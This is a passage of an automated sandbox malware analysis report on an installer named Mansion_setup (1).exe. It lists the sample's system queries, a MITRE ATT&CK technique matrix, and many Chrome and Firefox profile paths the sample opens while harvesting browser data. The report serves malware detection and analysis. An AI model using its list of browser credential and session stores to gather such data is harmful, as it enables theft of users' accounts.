Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\mansion.exe" --type=renderer --user-data-dir="c:\users\user\appdata\roaming\my-electron-app" --app-path="c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1739628551283596 --launch-time-ticks=4519743123 --mojo-platform-channel-handle=3100 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:1	Jump to behavior

Source: explorer.exe, 0000000D.00000000.1547282409.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1540886932.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.1565835129.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.1540886932.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.1540886932.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 0000000D.00000000.1539720367.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 0000000D.00000000.1540886932.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\Users\user VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\Users\user\AppData VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\Users\user\AppData\Local VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\resources VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\games\DDR5_NetCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\games\DDR5_NetCache\Array_User_Boot.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\games\DDR5_NetCache\Array_User_Boot.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\games\DDR5_NetCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\games\DDR5_NetCache\Array_User_Boot.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\games\DDR5_NetCache\qtZint.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.default
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\startupCache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsing\google4
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsing
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browser\newtab
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\doomed
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\thumbnails
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browser
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\entries

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	312 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	3 Virtualization/Sandbox Evasion	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	3 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	312 Process Injection	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	124 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report
Mansion_setup (1).exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Mansion_setup (1).exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Mansion_setup (1).exe